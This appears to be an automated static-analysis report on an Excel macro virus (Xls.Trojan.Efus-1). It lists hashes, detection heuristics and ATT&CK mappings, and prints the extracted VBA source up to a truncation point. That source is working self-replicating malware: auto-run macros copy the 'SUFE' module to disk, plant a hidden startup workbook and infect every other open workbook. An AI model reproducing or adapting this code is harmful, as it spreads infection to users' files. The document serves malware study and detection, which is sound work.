Xls.Trojan.Efus-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 69ec9e7c6b55778d…

MALICIOUS

Office (OLE)

664.5 KB Created: 2000-09-14 01:43:53 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: d876297317aa4b41d68c1b6a48a69032 SHA-1: 73b2d762f7ed7ee2d298109545125afcf9f4d44a SHA-256: 69ec9e7c6b55778dd2a430ac549418874040c753622a902a899c9fd8c186cd39
160 Risk Score

Malware Insights

Xls.Trojan.Efus-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic identified the file as Xls.Trojan.Efus-1. High-severity heuristics indicate the presence of Auto_Open and Auto_Close VBA macros, which are commonly used to execute malicious code upon opening or closing the document. The VBA script attempts to interact with files and macros located in 'C:\MS_DOS\', suggesting an attempt to establish persistence or execute further stages.

Heuristics 4

  • ClamAV: Xls.Trojan.Efus-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Efus-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11500 bytes
SHA-256: 8b66f2e06aa19856356415eaa69135f2a6414fdb015358aa297765ac20e533de
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "SUFE"
'\
'\Hello!Be sure to make good use of this piece of virus code.Good luck!
'\                                                           -SunUFeiEr
'\
Dim Modu
Dim Infected
Dim Code
Dim puJ
Sub Auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    Call Option_Set
    Call Settle_C
    Application.ScreenUpdating = True
    Call Action
End Sub
Sub Auto_close()
    On Error Resume Next
    Call Action
    Call Action_End
End Sub
Sub Option_Set()
On Error Resume Next
    With Application
        .UserName = "SUFE"
        .AltStartupPath = "C:\MS_DOS"
        .EnableSound = False
        .RollZoom = False
    End With
End Sub
Sub Settle_C()
    Dim If_Settled As Boolean
    On Error Resume Next
    With Application.FileSearch
        .LookIn = "C:\MS_DOS"
        .FileName = "Command.dos"
        If .Execute > 0 Then
            If_Settled = True
        End If
    End With
    If If_Settled = True Then
        Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
            ShortcutKey:="u"
        Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
        Call CodeExport
        Exit Sub
    Else
        Call CodeExport
        On Error Resume Next
        MkDir ("c:\MS_DOS")
        Workbooks.Add
        Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
        ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal
        ActiveWorkbook.Save
        ActiveWindow.Visible = False
    End If
    Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
        ShortcutKey:="u"
    Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
End Sub
Sub Action()
    On Error Resume Next
    Application.ScreenUpdating = False
    For puJ = 1 To Application.Workbooks.Count
        If (Application.Workbooks(puJ).FullName <> "C:\MS_DOS\Command.DOS" _
            And InStr(Application.Workbooks(puJ).FullName, "\") <> 0) Then
                Call CodeImport_Simple
        End If
    Next puJ
    Application.ScreenUpdating = True
    Call Punish
End Sub
Sub CodeExport()
    Dim i
    Dim hFile As Long
    On Error Resume Next
    i = 0
    For Each Modu In Application.VBE.ActiveVBProject.VBComponents
        i = i + 1
        If (Modu.Name = "SUFE") Then
            Code = Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.Lines(1, Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.CountOfLines)
            Code = "Attribute VB_Name = ""SUFE""" & Chr(13) & Code
        Exit For
        End If
    Next Modu
    hFile = FreeFile
    Open "c:\Ms_IO.sys" For Output Access Write As hFile
        Print #hFile, Code
    Close hFile
End Sub
Sub CodeImport()
    On Error Resume Next
    Infected = False
    For Each Modu In Application.ActiveWorkbook.VBProject.VBComponents
        If (Modu.Name = "SUFE") Then
            Infected = True
            Exit For
        End If
    Next Modu
    If Infected = False Then
        Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
        Application.ActiveWorkbook.Save
    End If
End Sub
Sub CodeImport_Simple()
    On Error Resume Next
    Infected = False
    For Each Modu In Application.Workbooks(puJ).VBProject.VBComponents
        If (Modu.Name = "SUFE") Then
            Infected = True
            Exit For

... (truncated)